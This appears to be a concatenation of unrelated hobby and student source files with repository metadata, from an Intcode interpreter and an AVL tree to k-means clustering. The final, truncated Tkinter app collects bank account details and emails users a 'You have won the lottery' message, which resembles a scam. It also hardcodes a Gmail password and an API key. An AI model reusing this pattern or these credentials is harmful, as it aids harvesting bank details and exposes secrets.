# I imagine there will eventually be modes beyond 'position' and
# 'immediate', but until there are this should be enough.
return program[param['value']] if param['mode'] is 0 else param['value']
# TODO Abstract the operation of running an instruction? The ones that use two
# values look awful similar, and then they could share debugging info.
def add_instruction(left_param, right_param, output_param):
left_value = get_param_value(left_param)
right_value = get_param_value(right_param)
program[output_param['value']] = left_value + right_value
if debug:
print('Left value',
left_value,
'right value',
right_value,
'result',
program[output_param['value']])
def multiply_instruction(left_param, right_param, output_param):
left_value = get_param_value(left_param)
right_value = get_param_value(right_param)
program[output_param['value']] = left_value * right_value
if debug:
print(program[output_param['value']])
def store_instruction(param):
value = input('>')
program[param['value']] = int(value)
def output_instruction(param):
value = get_param_value(param)
print('Output', value)
def jump_if_true_instruction(test_param, jump_param):
test_value = get_param_value(test_param)
address = get_param_value(jump_param)
if test_value != 0:
global instruction_index
instruction_index = address
def jump_if_false_instruction(test_param, jump_param):
test_value = get_param_value(test_param)
address = get_param_value(jump_param)
if test_value == 0:
global instruction_index
instruction_index = address
def less_than_instruction(left_param, right_param, output_param):
left_value = get_param_value(left_param)
right_value = get_param_value(right_param)
output_address = output_param['value']
if left_value < right_value:
program[output_address] = 1
else:
program[output_address] = 0
def equals_instruction(left_param, right_param, output_param):
left_value = get_param_value(left_param)
right_value = get_param_value(right_param)
output_address = output_param['value']
if left_value == right_value:
program[output_address] = 1
else:
program[output_address] = 0
def noop_instruction():
pass
# TODO Infer num_params from the actual functions. DRYer. This should work for
# now, though.
opcodes = {
1: {
'function': add_instruction,
'num_params': 3
},
2: {
'function': multiply_instruction,
'num_params': 3
},
3: {
'function': store_instruction,
'num_params': 1
},
4: {
'function': output_instruction,
'num_params': 1
},
5: {
'function': jump_if_true_instruction,
'num_params': 2
},
6: {
'function': jump_if_false_instruction,
'num_params': 2
},
7: {
'function': less_than_instruction,
'num_params': 3
},
8: {
'function': equals_instruction,
'num_params': 3
},
99: {
'function': noop_instruction,
'num_params': 0
}
}
def run_intcode_program(input_path, debug=False):
program_file = open(input_path, 'r')
# TODO Turn this into a 2D list, to make it easier to step between inputs?
# Might make debugging easier too.
global program
program = [int(x) for x in program_file.read().split(',')]
halted = False
global instruction_index
while halted != True:
cur_instruction_address = instruction_index
opcode_string = str(program[instruction_index])
opcode_string = opcode_string.zfill(5)
opcode = int(opcode_string[-2:])
modes = [int(char) for char in opcode_string[:-2]]
# Since modes are read right to left, we flip their order. That makes
# assigning them in the params array simpler.
modes.reverse()
if opcode == 99:
halted = True
# TODO Output the name of previous instruction? For day 5 it would
# help understand what's going wrong.
print('Halt instruction reached')
break
if debug:
print('Instruction #:',
instruction_index,
'Instruction',
program[instruction_index],
'opcode',
opcode_string,
'modes',
modes)
num_params = opcodes[opcode]['num_params']
params = program[instruction_index + 1 : instruction_index + 1 + num_params]
if debug:
print('Params: ' + str(num_params) + ', ' + str(params))
params = [{ 'mode': modes[i], 'value': param }
for i, param in enumerate(params)]
operator_function = opcodes[opcode]['function']
operator_function(*params)
if cur_instruction_address == instruction_index:
# No jump has been performed, so increment instruction pointer
instruction_index += num_params + 1
if __name__ == '__main__':
if 'DEBUG' in os.environ.keys():
debug = True
run_intcode_program(sys.argv[1], debug)
| NateEag/advent-of-code-solutions | 2019/day-5/solution.py | solution.py | py | 5,561 | python | en | code | 0 | github-code | 36 |
31920197231 | from google.cloud import vision
# with 開始から終了まで自動で実行してくれる
# rb read binaryモード バイナリーモードを読み込む
# テキスト以外のデータ 主に画像や動画
# road.jpgを開いて読み込む
with open('./road.jpg', 'rb') as image_file:
content = image_file.read()
# vision APIが扱える画像データに変換
image = vision.Image(content=content)
# annotation テキストや音声、画像などあらゆる形式のデータにタグ付けをする作業
# client データを扱う人、もの
# ImageAnnotatorClientのインスタンスを生成
annotater_client = vision.ImageAnnotatorClient()
response_data = annotater_client.label_detection(image=image)
labels = response_data.label_annotations
print('----RESULT----')
for label in labels:
print(label.description, ':', round(label.score * 100, 2), '%')
print('----RESULT----')
| yuuki-1227/vision-ai-test | index.py | index.py | py | 916 | python | ja | code | 0 | github-code | 36 |
32033427500 | # Example using PWM to fade an LED.
import time
from machine import Pin, PWM
A1 = PWM(Pin(0))
A2 = PWM(Pin(1))
B1 = PWM(Pin(2))
B2 = PWM(Pin(3))
steeringPin = Pin(7)
throttlePin = Pin(6)
# -255 to +255
def leftControl(speed):
speed = int(speed)
if(speed > 255):
speed = 255
if speed < -255:
speed = -255
print ("Left " + str(speed))
if speed < 0:
A1.duty_u16(0)
A2.duty_u16(abs(speed) * 256)
else:
A1.duty_u16(abs(speed) * 256)
A2.duty_u16(0)
def rightControl(speed):
speed = int(speed)
if(speed > 255):
speed = 255
if speed < -255:
speed = -255
print ("Right " + str(speed))
if speed < 0:
B1.duty_u16(0)
B2.duty_u16(abs(speed) * 256)
else:
B1.duty_u16(abs(speed) * 256)
B2.duty_u16(0)
def getPulseWidth(pin):
while pin.value() == 0:
pass
start = time.ticks_us()
while pin.value() == 1:
pass
end = time.ticks_us()
duration = end - start
if duration > 1490 and duration < 1510:
duration = 1500
return duration
leftControl(0)
rightControl(0)
while True:
steering = 0
throttlePulseWidth = getPulseWidth(throttlePin)
throttle = (float(throttlePulseWidth)-1500) / 2
steeringPulseWidth = getPulseWidth(steeringPin)
steering = (float(steeringPulseWidth) - 1500) / 2
print ("Throttle " + str(throttle))
print ("Steering " + str(steering))
total = throttle + steering
left = throttle
right = throttle
left = left - steering
right = right + steering
leftControl(left)
rightControl(right) | joeynovak/micropython-rc-car-esc-adapter | main.py | main.py | py | 1,808 | python | en | code | 0 | github-code | 36 |
25170664533 | import gspread
import pandas as pd
import numpy as np
from oauth2client.service_account import ServiceAccountCredentials
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score, precision_score, recall_score, f1_score, confusion_matrix
from flask import Flask, render_template
from datetime import datetime, timedelta
def run_script():
# Authenticate and open the Google Sheet
scope = ['https://www.googleapis.com/auth/spreadsheets', 'https://www.googleapis.com/auth/drive']
creds = ServiceAccountCredentials.from_json_keyfile_name('sp500-mes-06736c615696.json', scope)
client = gspread.authorize(creds)
sheet = client.open('SP500').sheet1
# Get the data from the sheet
data = sheet.get_all_records()
# Convert the data to a pandas DataFrame
df = pd.DataFrame(data)
# Convert the 'Date' column to a datetime object
df['Date'] = pd.to_datetime(df['Date'])
# Calculate the date 60 days before today
start_date = datetime.now() - timedelta(days=60)
# Filter the DataFrame to include only the last 60 days of data
df = df[df['Date'] >= start_date]
# Replace '.' with NaN
df = df.replace('.', np.nan)
df = df.dropna()
# Calculate daily returns
df['Return'] = df['SP500'].pct_change()
# Define a function to label the market direction
def label_market_direction(return_value):
if return_value > 0.001:
return 1
elif return_value < -0.001:
return -1
else:
return 0
# Create a new column with the market direction labels
df['Direction'] = df['Return'].apply(label_market_direction)
# Shift the 'Direction' column up by one to predict the next day's direction
df['Direction'] = df['Direction'].shift(-1)
# Drop rows with missing values
df = df.dropna()
# Split the data into features (X) and target (y) variables
X = df[['SP500', 'Return']]
y = df['Direction']
# Split the data into training and testing sets
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)
# Train a RandomForestClassifier
model = RandomForestClassifier(n_estimators=100, random_state=42)
model.fit(X_train, y_train)
# Predict the market direction on the test set
y_pred = model.predict(X_test)
# Calculate the accuracy, precision, recall, and F1-score of the model
accuracy = accuracy_score(y_test, y_pred)
precision = precision_score(y_test, y_pred, average='weighted')
recall = recall_score(y_test, y_pred, average='weighted')
f1 = f1_score(y_test, y_pred, average='weighted')
# Compute the confusion matrix
confusion = confusion_matrix(y_test, y_pred)
confusion_list = list(zip(*confusion))
# Predict the market direction for the last data point
last_data_point = X.iloc[-1].values.reshape(1, -1)
last_direction_prediction = model.predict(last_data_point)
# Get the class probabilities for the last data point
confidence_values = model.predict_proba(last_data_point)
return {
"accuracy": accuracy,
"precision": precision,
"recall": recall,
"f1_score": f1,
"confusion_matrix": confusion_list,
"confidence_values": confidence_values
}
app = Flask(__name__)
@app.route('/')
def home():
results = run_script()
accuracy = "{:.2%}".format(results["accuracy"])
precision = "{:.2%}".format(results["precision"])
recall = "{:.2%}".format(results["recall"])
f1 = "{:.2%}".format(results["f1_score"])
cm = results["confusion_matrix"]
confidence_values = results["confidence_values"]
now = datetime.now()
today = now.strftime("%B %d, %Y")
return render_template(
'index.html',
title=f'SP500 Prediction for next day, as of {today}',
accuracy=accuracy,
precision=precision,
recall=recall,
f1=f1,
confusion_matrix=cm,
confidence_values=confidence_values
)
if __name__ == '__main__':
app.run(debug=True)
| Big6Ent/Predict_Next_Day_SP500_Direction | sp500_confidence.py | sp500_confidence.py | py | 4,152 | python | en | code | 0 | github-code | 36 |
26490765888 | import base64
from rest_framework import serializers
from categories.models import Categories, Translations, Authorities
from categories.serializers import TranslationsSerializer
from users.models import User
from .models import Documents
def get_predicted_trees():
try:
return Categories.objects.filter(
deprecated=False, parent=None, level=0
).values_list("tree_id", "name")
except Exception as e:
return []
class UsersSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = ["username"]
class CategoriesSerializer(serializers.ModelSerializer):
translation = serializers.SerializerMethodField()
authority = serializers.SerializerMethodField(method_name="get_authority")
class Meta:
model = Categories
exclude = ["lft", "rght", "level"]
def get_translation(self, obj):
translation = Translations.objects.filter(category=obj, language="es").first()
if translation:
serializer = TranslationsSerializer(translation)
return serializer.data
return None
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = ["username"]
class DocumentsSerializer(serializers.ModelSerializer):
pdf = serializers.CharField(
max_length=None,
style={"placeholder": "Enter the base64 of the pdf"},
)
img = serializers.CharField(
max_length=None,
style={"placeholder": "Enter the base64 of the img"},
write_only=True,
)
category = serializers.SerializerMethodField()
created_by = serializers.SerializerMethodField()
updated_by = serializers.SerializerMethodField()
predicted_trees = serializers.MultipleChoiceField(
choices=get_predicted_trees(), write_only=True, required=False
)
class Meta:
model = Documents
fields = "__all__"
read_only_fields = (
"created_at",
"updated_at",
"created_by",
"updated_by",
"num_of_access",
)
def get_category(self, obj):
categories = obj.categories.filter(authority__disabled=False)
if categories:
serializer = CategoriesSerializer(categories, many=True)
return serializer.data
return None
def get_created_by(self, obj):
serializer = UserSerializer(obj.created_by)
return serializer.data
def get_updated_by(self, obj):
serializer = UserSerializer(obj.updated_by)
return serializer.data
def to_representation(self, instance):
representation = super().to_representation(instance)
representation["pdf"] = None
if self.context.get("request") and self.context["request"].path.endswith(
f"/{instance.id}/"
):
Documents.objects.filter(id=instance.id).update(
num_of_access=instance.num_of_access + 1
)
if instance.pdf:
pdf_base64 = base64.b64encode(instance.pdf).decode("utf-8")
representation["pdf"] = pdf_base64
return representation
class DocumentsTextExtractorSerializer(serializers.Serializer):
"""
Serializer for the DocumentsTextExtractor.
Converts instances of the DocumentsTextExtractor to JSON and vice versa.
Attributes:
title (CharField): The base64 encoded title of the document.
summary (CharField): The base64 encoded summary of the document.
"""
title = serializers.CharField(
max_length=None, style={"placeholder": "Enter the base64 for the title"}
)
summary = serializers.CharField(
max_length=None, style={"placeholder": "Enter the base64 for the summary"}
)
| JU4NP1X/teg-backend | documents/serializers.py | serializers.py | py | 3,796 | python | en | code | 1 | github-code | 36 |
35451201459 | import cv2
from pydarknet import Detector, Image
net = Detector(bytes("tank.cfg", encoding="utf-8"), bytes("tank.weights", encoding="utf-8"), 0, bytes("tank.data",encoding="utf-8"))
def Detect(path):
vidObj = cv2.VideoCapture(path)
count = 0
success = 1
while success:
success, image = vidObj.read()
img_darknet = Image(image)
results = net.detect(img_darknet)
for cat, score, bounds in results:
x, y, w, h = bounds
cv2.rectangle(image, (int(x - w / 2), int(y - h / 2)), (int(x + w / 2), int(y + h / 2)), (255, 0, 0), thickness=2)
cv2.putText(image,str(cat.decode("utf-8")),(int(x),int(y)),cv2.FONT_HERSHEY_COMPLEX,1,(255,255,0))
cv2.imshow("Detected Tank", image)
if cv2.waitKey(25) & 0xFF == ord('q'):
break
count += 1
if __name__ == '__main__':
#Detect(path to the surveillance video)
Detect("test.mp4")
| wisekrack/BattleTankDown | tankLocFromSurveillanceVideo.py | tankLocFromSurveillanceVideo.py | py | 958 | python | en | code | 1 | github-code | 36 |
29997839939 | from OpenGL.GL import *
from OpenGL.GLU import *
import sys
#from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QOpenGLWidget
from PyQt5.QtWidgets import QOpenGLWidget, QApplication, QMainWindow, QLabel, QLineEdit, QVBoxLayout, QWidget
from PyQt5.QtWidgets import QSlider
from PyQt5.QtCore import *
class MyGLWidget(QOpenGLWidget):
def __init__(self, parent=None):
super(MyGLWidget, self).__init__(parent)
self.r = self.g = self.b = 0.0
def initializeGL(self):
# OpenGL 그리기를 수행하기 전에 각종 상태값을 초기화
glClearColor(0.8, 0.8, 0.6, 1.0)
def resizeGL(self, width, height):
# 카메라의 투영 특성을 여기서 설정
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
def paintGL(self):
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
# 색과 프리미티브를 이용한 객체 그리기
glColor3f(self.r, self.g, self.b)
glBegin(GL_TRIANGLES)
glVertex3fv([-1.0, 0.0, 0.0])
glVertex3fv([ 1.0, 0.0, 0.0])
glVertex3fv([ 0.0, 1.0, 0.0])
glEnd()
# 그려진 프레임버퍼를 화면으로 송출
glFlush()
def setR(self, val):
self.r = val/99
self.update()
def setG(self, val):
self.g = val/99
self.update()
def setB(self, val):
self.b = val/99
self.update()
class MyWindow(QMainWindow):
def __init__(self, title = ''):
QMainWindow.__init__(self) # call the init for the parent class
self.setWindowTitle(title)
self.glWidget = MyGLWidget()
### GUI 설정
gui_layout = QVBoxLayout()
central_widget = QWidget()
central_widget.setLayout(gui_layout)
self.setCentralWidget(central_widget)
gui_layout.addWidget(self.glWidget)
sliderX = QSlider(Qt.Horizontal)
sliderX.valueChanged.connect(lambda val: self.glWidget.setR(val))
sliderY = QSlider(Qt.Horizontal)
sliderY.valueChanged.connect(lambda val: self.glWidget.setG(val))
sliderZ = QSlider(Qt.Horizontal)
sliderZ.valueChanged.connect(lambda val: self.glWidget.setB(val))
gui_layout.addWidget(sliderX)
gui_layout.addWidget(sliderY)
gui_layout.addWidget(sliderZ)
def main(argv = []):
app = QApplication(argv)
window = MyWindow('GL with Qt Widgets')
window.setFixedSize(600, 600)
window.show()
sys.exit(app.exec_())
if __name__ == '__main__':
main(sys.argv)
| dknife/2021Graphics | Source/01_Windowing/04_GLwQtWidgets.py | 04_GLwQtWidgets.py | py | 2,613 | python | en | code | 2 | github-code | 36 |
28886974693 | import os
import numpy as np
import tensorflow as tf
from tensorflow.keras.models import load_model
from tensorflow.keras.preprocessing.image import img_to_array, load_img
from tqdm import tqdm
import json
def preprocess_image(image_path, target_size):
img = load_img(image_path, target_size=target_size)
img_array = img_to_array(img)
img_array = np.expand_dims(img_array, axis=0)
img_array /= 255.0
return img_array
def classify_images(model_path, image_dir, target_size, output_json):
model = load_model(model_path)
results = []
lesion_type_mapping = {
0: "BKL",
1: "NV",
2: "DF",
3: "MEL",
4: "VASC",
5: "BCC",
6: "AKIEC"
}
test_image_paths = [os.path.join(image_dir, filename) for filename in os.listdir(image_dir) if filename.endswith('.jpg')]
test_images = [preprocess_image(image_path, target_size) for image_path in tqdm(test_image_paths)]
test_images = np.vstack(test_images)
predictions = model.predict(test_images)
for image_path, prediction in zip(test_image_paths, predictions):
predicted_label = lesion_type_mapping[np.argmax(prediction)]
img_id = os.path.splitext(os.path.basename(image_path))[0]
results.append({"image_id": img_id, "lesion_type": predicted_label})
with open(output_json, 'w') as f:
json.dump(results, f)
if __name__ == "__main__":
model_path = '/Users/donika/Desktop/images/model_training/model.h5'
image_dir = '/Users/donika/Desktop/images/datasets/test'
target_size = (128, 128)
output_json = 'JSON.json'
classify_images(model_path, image_dir, target_size, output_json)
| Donike98/Assignment_Solaborate | model_inference/JSON.py | JSON.py | py | 1,701 | python | en | code | 0 | github-code | 36 |
31931640588 | import srt
from datetime import timedelta
INPUT = "You've Got Mail (si).srt"
OUTPUT = "out.srt"
START = 1411
END = -1
SHIFT = timedelta(milliseconds=1000)
with open(INPUT) as f:
subs = list(srt.parse(f.read()))
for sub in subs[START-1:END]:
sub.start += SHIFT
sub.end += SHIFT
with open(OUTPUT, 'w') as f:
f.write(srt.compose(subs))
| aquiire/liyum-awith | sync.py | sync.py | py | 353 | python | en | code | 0 | github-code | 36 |
2030937421 | class avl:
def __init__(self, val):
self.val = val
self.left = None
self.right = None
self.bal = 0
self.depth = 0
def rotateLeft(self):
print("tree before rotate: ", self.left, self.val, self.right)
top = self.right
self.right = top.left
top.left = self
self = top
print("tree before rotate: ", self.left, self.val, self.right)
self.bal -= 1
self.left.bal -= 2
return True
def rotateRight(self):
print("tree before rotate: ", self.left, self.val, self.right)
top = self.left
self.left = top.right
top.right = self
self = top
print("tree after rotate: ", self.left, self.val, self.right)
self.bal += 1
self.right.bal += 2
return self
def addNode(self, node):
if node.val < self.val:
if self.left == None:
self.left = node
self.bal -= 1
self.depth += 1
else:
self.left.addNode(node)
self.bal += self.left.bal
else:
if self.right == None:
self.right = node
self.bal += 1
else:
self.right.addNode(node)
self.bal += self.right.bal
if self.bal < -1:
print("balance: ", self.bal, "rotate right")
self = self.rotateRight()
elif self.bal > 1:
print("balance: ", self.bal, "rotate left")
self.rotateLeft()
return True
def preOrderTraversal(self):
print(self.val)
if self.left:
self.left.preOrderTraversal()
if self.right:
self.right.preOrderTraversal()
return True
def inOrderTraversal(self):
if self.left:
self.left.inOrderTraversal()
print(self.val)
if self.right:
self.right.inOrderTraversal()
return True
def postOrderTraversal(self):
if self.left:
self.left.postOrderTraversal()
if self.right:
self.right.postOrderTraversal()
print(self.val)
x = avl(6)
y = avl(3)
z = avl(1)
a = avl(4)
x.addNode(y)
x.addNode(z)
x.addNode(a)
print("Tree: ")
y.postOrderTraversal()
| youngseok-seo/cs-fundamentals | Trees/avl.py | avl.py | py | 2,367 | python | en | code | 0 | github-code | 36 |
35205340902 | from RocketMilesClass import RocketMiles
import time
import logging.handlers
import datetime
import os
#Smoke test for basic functionality of the Search Results page for the Rocketmiles.com search app.
#This module contains an error logger, test preconditions, and TCIDs 9-10.
#Initializing class object.
RM = RocketMiles()
#Error Logger
#Create a new log folder if none exists, then the log file.
try:
os.mkdir('logs/')
except:
print()
try:
os.mkdir('logs/SearchResultsModule')
except:
print()
#Creating log filepath. Syntax is an acronym for the module (in this case, Smoke Test Checkout), followed by a Year_Month_Day__Hour_Minute_Second timestamp.
logSuffix = datetime.datetime.now()
logName = 'logs/SearchResultsModule/STSR_log_' + logSuffix.strftime('%Y_%m_%d__%H%M_%S') + '.log'
try:
logFileCreate = open(logName,"w+")
logFileCreate.close()
except:
print()
#Set up logging objects
logsHandler = logging.handlers.WatchedFileHandler(os.environ.get("LOGFILE", logName))
logsFormatting = logging.Formatter(logging.BASIC_FORMAT)
logsHandler.setFormatter(logsFormatting)
root = logging.getLogger()
root.setLevel(os.environ.get("LOGLEVEL", "INFO"))
root.addHandler(logsHandler)
print("Current testing log file is: ", logName)
#Preconditions for proceeding with smoke test.
try:
logging.info('Starting smoke test preconditions.')
print('Starting smoke test preconditions.')
RM.open_search_page()
RM.close_cookie_banner()
RM.loadtime()
except Exception as err:
print(str(err))
logging.exception(str(err))
#Smoke Test for Search Results (TCIDs 9-10),
try:
#TCID 9: Search Page - Can a user sort results by Miles using the Sort By dialogue box?
print('Beginning TCID 9: Search Page - Can a user sort results by Miles using the Sort By dialogue box?')
logging.info('Beginning TCID 9: Search Page - Can a user sort results by Miles using the Sort By dialogue box?')
RM.select_sort_by_field()
RM.click_miles()
RM.loadtime()
print('TCID 9 has been executed.')
logging.info('TCID 9 has been executed.')
#TCID 10: Search Page - Can a user select the "Select Now" button for the first listing?
print('Beginning TCID 10: Search Page - Can a user select the "Select Now" button for the first listing?')
logging.info('Beginning TCID 10: Search Page - Can a user select the "Select Now" button for the first listing?')
RM.select_hotel()
RM.loadtime()
print('TCID 10 has been executed.')
logging.info('TCID 10 has been executed.')
except Exception as err:
logging.exception(str(err))
#Ending smoke test for Search Results module.
print('Search Results module smoke test complete. Closing browser.')
RM.close_browser()
logging.info('Search Results module smoke test complete. Browser closed.') | just-hugo/Test-Automation | Rocketmiles/SmokeTestSearchResultsModule.py | SmokeTestSearchResultsModule.py | py | 2,827 | python | en | code | 0 | github-code | 36 |
27621948392 | import time
import pandas as pd
import numpy as np
import random
from sklearn.metrics.pairwise import cosine_similarity, euclidean_distances,manhattan_distances
from sklearn.preprocessing import MinMaxScaler
from sklearn.decomposition import PCA
from sklearn.manifold import TSNE
import matplotlib.pyplot as plt
#CLASS START=====================================================================================================================
class kmeans:
def __init__(self,k):
self.k = k
#Function to read and preproccess the data
def read_data(self):
MNIST_df = pd.read_csv("image_new_test_MNIST.txt", header=None)
MNIST_array = np.array(MNIST_df)
MNIST_array = MNIST_array.astype(float)
#normalization of data using minmax scaler
scaler = MinMaxScaler()
scaled_MNIST_array = scaler.fit_transform(MNIST_array)
#dimension reduction
pca = PCA(n_components= 30)
pca_MNIST_array = pca.fit_transform(scaled_MNIST_array)
#high dimension reduction using TSNE
tsne = TSNE(n_components = 2, perplexity = 40, init = 'pca', random_state=0)
tsne_MNIST_array = tsne.fit_transform(pca_MNIST_array)
return tsne_MNIST_array, MNIST_df
#Function to calculate the manhattan distance
def clustering_manhattan_distance(self, MNIST_array, centroids):
distance_matrix = manhattan_distances(MNIST_array, centroids)
closest_centroids = []
for i in range(distance_matrix.shape[0]):
c = np.argmin(distance_matrix[i])
closest_centroids.append(c)
return closest_centroids
#Function to calculate the similarity
def clustering_cosine_similarity(self, MNIST_array, centroids):
distance_matrix = cosine_similarity(MNIST_array, centroids)
closest_centroids = []
for i in range(distance_matrix.shape[0]):
c = np.argmax(distance_matrix[i])
closest_centroids.append(c)
return closest_centroids
#Function to calculate euclidean distance
def clustering_euclidean_distance(self, MNIST_array, centroids):
distance_matrix = euclidean_distances(MNIST_array, centroids)
closest_centroids = []
for i in range(distance_matrix.shape[0]):
c = np.argmin(distance_matrix[i])
closest_centroids.append(c)
return closest_centroids
#Function to clculate the centroids
def calculate_centroids(self, MNIST_array, nearest_centroid, centroids):
cluster_d = list()
#all_cluster_distances = [0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0]
all_cluster_distances = np.zeros(len(centroids))
new_centroids = list()
new_df = pd.concat([pd.DataFrame(MNIST_array), pd.DataFrame(nearest_centroid, columns=['Cluster'])], axis=1)
new_df_arr = np.array(new_df['Cluster'])
for c in set(new_df_arr):
thiscluster = new_df[new_df['Cluster'] == c][new_df.columns[:-1]]
temp = np.array(centroids[c])
temp = temp.reshape(1,-1)
#cluster_d = euclidean_distances(thiscluster, temp)
cluster_d = manhattan_distances(thiscluster, temp)
for d in cluster_d:
all_cluster_distances[c] += d*d
cluster_mean = thiscluster.mean(axis=0)
new_centroids.append(cluster_mean)
return new_centroids, all_cluster_distances
#Function to visualize the SSE and no.of iterations
def visualize_sse(self, iterations, SSE):
plt.figure()
plt.plot(range(iterations), SSE, 'rx-')
plt.xlabel('No.of iterations')
plt.ylabel('SSE(Sum of squared errors)')
plt.title('Elbow Method showing the optimal iterations')
plt.show()
#Function to visualize the SSE and different k-values:
def visualize_k_sse(self):
MNIST_array, MNIST_df = self.read_data()
all_SSE = []
all_k = []
for k in range(2,21,2):
#Randomly select three points as centroids
centroid_index = random.sample(range(0, len(MNIST_df)), k)
centroids = list()
for i in centroid_index:
centroids.append(MNIST_array[i])
#converting list into numpy array
centroids = np.array(centroids)
#List for sum of squared errors
SSE = list()
no_of_iterations = 50
closest_centroid = list()
for i in range(no_of_iterations):
closest_centroid = self.clustering_manhattan_distance(MNIST_array, centroids)
#closest_centroid = clustering_cosine_similarity(iris_array, centroids)
centroids, all_cluster_d = self.calculate_centroids(MNIST_array, closest_centroid, centroids)
SSE.append(sum(all_cluster_d))
all_SSE.append(min(SSE))
all_k.append(k)
#Plot the values
plt.figure()
plt.plot(all_SSE , all_k,'rx-')
plt.xlabel('SSE')
plt.ylabel('K-values')
plt.title('The Elbow Method showing the optimal k - value')
plt.show()
#Function for k-means clustering
def main_kmeans(self):
MNIST_array, MNIST_df = self.read_data()
#number of clusters
k = self.k
#Randomly select k number of points as centroids
centroid_index = random.sample(range(0, len(MNIST_df)), k)
centroids = list()
for i in centroid_index:
centroids.append(MNIST_array[i])
#converting list into numpy array
centroids = np.array(centroids)
#List for sum of squared errors
SSE = list()
no_of_iterations = 50
closest_centroid = list()
for i in range(no_of_iterations):
#closest_centroid = self.clustering_euclidean_distance(MNIST_array, centroids)
#closest_centroid = self.clustering_cosine_similarity(MNIST_array, centroids)
closest_centroid = self.clustering_manhattan_distance(MNIST_array, centroids)
centroids, all_cluster_d = self.calculate_centroids(MNIST_array, closest_centroid, centroids)
SSE.append(sum(all_cluster_d))
clustered_MNIST_df = pd.concat([pd.DataFrame(MNIST_array), pd.DataFrame(closest_centroid, columns=['Cluster'])], axis=1)
clustered_MNIST_df.replace({0:1,1:2,2:3,3:4,4:5,5:6,6:7,7:8,8:9,9:10}, inplace=True)
#To visualize the number iterations on kmeans and SSE
self.visualize_sse(no_of_iterations, SSE)
#Saving the results into the file
clustered_MNIST_df.to_csv('MNIST_results.csv',columns=['Cluster'], index =False, header = False)
#CLASS END=====================================================================================================================
#MAIN START=====================================================================================================================
#Execution start time
start_time = time.time()
kmeans_obj = kmeans(k = 10)
kmeans_obj.main_kmeans()
#To visualize the different k values and SSE
#kmeans_obj.visualize_k_sse()
print("Total execution time :", time.time() - start_time, "seconds")
#MAIN END=====================================================================================================================
| hrishivib/k-means-iris-MNIST-classification | k-means_MNIST.py | k-means_MNIST.py | py | 7,624 | python | en | code | 0 | github-code | 36 |
36376749917 | # Devin Fledermaus Class 1
import tkinter
from tkinter import *
from tkinter import messagebox
from playsound import playsound
import requests
from datetime import datetime
import re
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
# Creating the window
root = Tk()
root.geometry("700x800")
root.resizable(False, False)
root.title("Banking Details")
root.config(bg="blue")
now = datetime.now()
class BankDetails:
def __init__(self, window):
# Labels
self.lbl1 = Label(window, text="Banking Details", font=("Arial", 30))
self.lbl1.place(x=200, y=30)
self.lbl2 = Label(window, text="Account Holder Name", font=("Arial", 15))
self.lbl2.place(x=50, y=100)
self.lbl3 = Label(window, text="Account number", font=("Arial", 15))
self.lbl3.place(x=50, y=150)
self.lbl4 = Label(window, text="Bank", font=("Arial", 15))
self.lbl4.place(x=50, y=200)
# Entries
self.ent1 = Entry(root, width=30)
self.ent1.place(x=300, y=100)
self.ent2 = Entry(root, width=30)
self.ent2.place(x=300, y=150)
self.ent3 = Entry(root, width=20)
self.ent3.place(x=150, y=500)
self.ent4 = Entry(root, width=20, state="readonly")
self.ent4.place(x=150, y=650)
# OptionMenu
self.default_txt = "Select Bank"
self.default_var = tkinter.StringVar(value=self.default_txt)
self.optmenu = OptionMenu(root, self.default_var, "Absa Bank", "Capitec Bank", "Standard Bank", "First National Bank")
self.optmenu.place(x=300, y=200)
# Buttons
self.btn = Button(root, text="Submit", width=5, bg="green", command=self.check, borderwidth=5)
self.btn.place(x=300, y=320)
self.clrbtn = Button(root, text="Clear", width=5, bg="green", command=self.clear, borderwidth=5)
self.clrbtn.place(x=150, y=320)
self.extbtn = Button(root, text="Exit", width=5, bg="green", command=self.exit_btn, borderwidth=5)
self.extbtn.place(x=450, y=320)
self.conbtn = Button(root, text="Convert", width=16, bg="green", command=self.convert, borderwidth=5)
self.conbtn.place(x=150, y=570)
# Retrieving the information from an external JSON file as a source of reference
self.conversion_rate = {}
try:
self.information = requests.get('https://v6.exchangerate-api.com/v6/910ab09f145c5695a5228187/latest/ZAR')
information_json = self.information.json()
self.conversion_rate = information_json['conversion_rates']
except requests.exceptions.ConnectionError:
messagebox.showerror("Error", "No internet connection. Please try again later.")
# Listbox
self.convert_list = Listbox(root, width=15, bg="white")
for i in self.conversion_rate.keys():
self.convert_list.insert(END, str(i))
self.convert_list.place(x=370, y=500)
# Defining the buttons
# Defining my conversion button
def convert(self):
try:
information = requests.get('https://v6.exchangerate-api.com/v6/910ab09f145c5695a5228187/latest/ZAR')
information_json = information.json()
conversion_rate = information_json['conversion_rates']
num = float(self.ent3.get())
ans = num * information_json['conversion_rates'][self.convert_list.get(ACTIVE)]
self.ent4['state'] = 'normal'
self.ent4.delete(0, END)
self.ent4.insert(0, ans)
self.ent4['state'] = 'readonly'
except (ValueError, requests.exceptions.ConnectionError):
self.ent3.delete(0, END)
self.ent4.delete(0, END)
messagebox.showerror("Error", "Please enter digits")
# Sending my email
def verify(self):
# text file
w = open("user_details.txt", "a+")
w.write("Account Holder Name: " + self.ent1.get() + "\n")
w.write("Account Number: " + self.ent2.get() + "\n")
w.write("Bank: " + self.default_var.get() + "\n")
w.write("Logged in at " + str(now) + " " + "&" + "\n")
w.write("\n")
w.close()
file_to_read = "user_details.txt"
file = open(file_to_read, "r")
list_file = file.readlines()
email_list = str(list_file)
emails = re.findall(r"[a-z0-9\.\-+_]+@[a-z0-9\.\-+_]+\.[a-z]+", email_list)
email = emails[-1]
sender_email_id = 'lottodevin@gmail.com'
receiver_email_id = email
password = "Pythonlotto"
subject = "Congratulations"
msg = MIMEMultipart()
msg['From'] = sender_email_id
msg['To'] = receiver_email_id
msg['Subject'] = subject
body = "You have won the lottery.\n"
body = body + "You will be contacted for further details"
msg.attach(MIMEText(body, 'plain'))
text = msg.as_string()
s = smtplib.SMTP('smtp.gmail.com', 587)
